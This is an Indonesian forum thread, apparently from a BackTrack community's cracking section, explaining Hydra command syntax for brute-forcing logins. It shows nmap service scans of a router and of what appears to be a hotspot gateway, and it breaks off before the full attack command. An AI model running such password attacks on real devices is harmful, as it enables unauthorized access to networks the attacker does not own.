+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Cracking (https://www.indonesianbacktrack.or.id/forum/forum-126.html)
+--- Thread: Hydra how to- (/thread-994.html)
hydra -L "userlist" -P "wordlist" ip-target service PLAIN
artinya: -L digunakan jika kita mempunyai list user yg kemungkinan dipake (ga pake -L jg bisa kok tapi harus di sebut usernya, tapi harus huruf L kecil, contoh --> -l admin)
-P adalah wordlist yang kita punya, klo di BT5 defaulnya ada di /pentest/passwords/wordlists/darkc0de.lst
ip-target diisi target kita, bisa webserver, router, switch, apapun itu asal ada ip dan service yg berjalan (dan termasuk dalam service yg ada di hydra tentunya)
service adalah sesuai yang ada di help hydra (lebih baiknya di nmap -sV dulu)
PLAIN jika target tidak menggunakan HTTPS (jika ada gunakan -S untuk melakukan koneksi SSL)
contohnya...
pertama kita lakukan port scanning dulu dengan nmap:
Code:
root@iKONs:~# nmap -sV 192.168.1.1
Quote:Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-24 01:11 WIT
Nmap scan report for 192.168.1.1
Host is up (0.00078s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Netgear broadband router or ZyXel VoIP adapter ftpd 1.0 23/tcp open telnet Netgear broadband router or ZyXel VoIP adapter telnetd
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
MAC Address: D8:5D:4C:A1:9D:E7 (Tp-link Technologies Co.)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.30 seconds
dari data diatas dapat kita lihat bahwa port 23 a.k.a service telnet aktif...
kemudian mari kita jalankan hydra dengan asumsi username adalah admin dan service yang mau dibrute force adalah telnet:
(10-24-2011, 05:34 PM)konspirasi Wrote: ya kan diliat -sV di nmap bro, nanti kita liat ada service yg bisa dieksploitasi dengan hydra ato ga?
dah di coba ni reportnya :
Spoiler! :
Code:
# nmap -sV 10.100.0.1
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-23 23:29 WIT
Nmap scan report for hotspot.zone.net (10.100.0.1)
Host is up (0.094s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Mikrotik RouterOS named or OpenDNS Updater
80/tcp open http?
443/tcp open https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port80-TCP:V=5.59BETA1%I=7%D=10/23%Time=4EA440F5%P=i686-pc-linux-gnu%r(
SF:GetRequest,181,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache\r\
SF:nConnection:\x20close\r\nContent-Length:\x20227\r\nContent-Type:\x20tex
SF:t/html\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:12\x20GMT\r\nExpi
SF:res:\x200\r\n\r\n<html>\n<head>\n<title>\.\.\.</title>\n<meta\x20http-e
SF:quiv=\"refresh\"\x20content=\"5;\x20url=http://hotspot\.zone\.net/statu
SF:s\">\n<meta\x20http-equiv=\"pragma\"\x20content=\"no-cache\">\n<meta\x2
SF:0http-equiv=\"expires\"\x20content=\"-1\">\n</head>\n<body>\n</body>\n<
SF:/html>\n")%r(HTTPOptions,EF,"HTTP/1\.0\x20503\x20unknown\x20method\r\nC
SF:onnection:\x20close\r\nContent-Length:\x20119\r\nDate:\x20Mon,\x2024\x2
SF:0Oct\x202011\x2009:32:12\x20GMT\r\nExpires:\x200\r\n\r\n<html>\n<head><
SF:title>Error\x20503:\x20unknown\x20method</title></head>\n<body>\n<h1>Er
SF:ror\x20503:\x20unknown\x20method</h1>\n</body>\n</html>\n")%r(RTSPReque
SF:st,EF,"HTTP/1\.0\x20503\x20unknown\x20method\r\nConnection:\x20close\r\
SF:nContent-Length:\x20119\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:
SF:12\x20GMT\r\nExpires:\x200\r\n\r\n<html>\n<head><title>Error\x20503:\x2
SF:0unknown\x20method</title></head>\n<body>\n<h1>Error\x20503:\x20unknown
SF:\x20method</h1>\n</body>\n</html>\n")%r(FourOhFourRequest,E0,"HTTP/1\.0
SF:\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nContent-Length:\x201
SF:09\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:17\x20GMT\r\nExpires:
SF:\x200\r\n\r\n<html>\n<head><title>Error\x20404:\x20Not\x20Found</title>
SF:</head>\n<body>\n<h1>Error\x20404:\x20Not\x20Found</h1>\n</body>\n</htm
SF:l>\n")%r(GenericLines,E6,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nConnect
SF:ion:\x20close\r\nContent-Length:\x20113\r\nDate:\x20Mon,\x2024\x20Oct\x
SF:202011\x2009:32:17\x20GMT\r\nExpires:\x200\r\n\r\n<html>\n<head><title>
SF:Error\x20400:\x20Bad\x20Request</title></head>\n<body>\n<h1>Error\x2040
SF:0:\x20Bad\x20Request</h1>\n</body>\n</html>\n")%r(Help,E6,"HTTP/1\.0\x2
SF:0400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Length:\x2011
SF:3\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:36\x20GMT\r\nExpires:\
SF:x200\r\n\r\n<html>\n<head><title>Error\x20400:\x20Bad\x20Request</title
SF:></head>\n<body>\n<h1>Error\x20400:\x20Bad\x20Request</h1>\n</body>\n</
SF:html>\n");
MAC Address: 00:15:6D:67:76:22 (Ubiquiti Networks)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.71 seconds
port 80 dan 443 bisa tapi jika ada aplikasi web dijalankan disitu, coba aja buka pake browser bro http://10.100.0.1 trus https://10.100.0.1, ada halaman login ga?
klo ga ada kemungkinan memang tidak dapat diakses dari ip diluar ip internalnya, jadi ga bisa dieksploitasi dengan hydra
di service ada http[s]-{head|get} dan http[s]-{get|post}-form, disitu ada form username n password kan? berarti dia menggunakan metode post, karena hanya http kita gunakan yang: